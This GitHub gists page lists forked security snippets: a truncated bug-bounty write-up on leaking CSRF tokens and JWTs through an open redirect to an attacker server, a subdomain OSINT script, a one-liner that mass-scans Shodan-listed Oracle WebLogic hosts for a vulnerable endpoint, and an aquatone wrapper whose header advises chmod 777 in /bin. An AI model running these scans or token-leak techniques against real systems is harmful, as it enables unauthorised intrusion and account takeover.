Skip to content

Instantly share code, notes, and snippets.

View itsmenaga's full-sized avatar

itsmenaga

6 followers · 0 following
View GitHub Profile
@itsmenaga
itsmenaga / csrf_jwt_redirect_leak.md
Created May 16, 2019 03:42 — forked from stefanocoding/csrf_jwt_redirect_leak.md

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user 
    GET /verify/VALUE HTTP/1.1
Host: example.com
@itsmenaga
itsmenaga / subdomain.rb
Created April 24, 2019 16:22 — forked from nikallass/subdomain.rb
Subdomain OSINT script, running several best tools.
#Tools based on a resolver.rb by @melvinsh
#Repository: https://github.com/melvinsh/subresolve
#Modified by @ehsahil for Personal Use.
#Modified by @nikallass for Personal Use.
require 'socket'
require 'colorize'
begin
if ARGV[0] == nil
@itsmenaga
itsmenaga / gist:5bf91071e040116bd00348ace9f8bd32
Created April 18, 2019 05:51 — forked from Viss/gist:e7c735ed389c8d055e6f31e845f25516
bash one liner for extracting shodan results for weblogic.
#!/bin/bash
# this script was written by viss as a challenge from @random_robbie
# This one-liner replaces a fairly lengthy python script
# if you want to be walked through it, sign up for square cash, send $viss 20 dollars. Otherwise, flex your google fu!
# oh, ps: you need to pip install shodan, and then configure the shodan cli client by giving it your api key.
# then you're off to the races.
shodan search --fields ip_str --limit 1000 'product:"Oracle Weblogic" port:"7001" country:"US"' | sort -u | nmap -sT -Pn -n -oG - -iL - -p 7001 | grep open | awk '{print $2}' | xargs -I % -n 1 -P 30 bash -c 'RESULT=`curl -s -I -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko0100101 Firefox/54.0" -H "Connection":"close" -H "Accept-Language":"en-US -H en;q=0.5" -H "Accept":"text/html -H application/xhtml+xml -H application/xml;q=0.9 -H */*;q=0.8" -H "Upgrade-Insecure-Requests":"1" %:7001/ws_utc/config.do | egrep HTTP`; echo "%: $RESULT";'
@itsmenaga
itsmenaga / aq.sh
Created September 8, 2018 16:15 — forked from random-robbie/aq.sh
aq put it in /bin/ and chmod 777 it
#!/bin/bash
aquatone-discover -d $1 --threads 10
aquatone-scan -d $1 --ports huge --threads 10
DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10
aquatone-takeover -d $1 --threads 10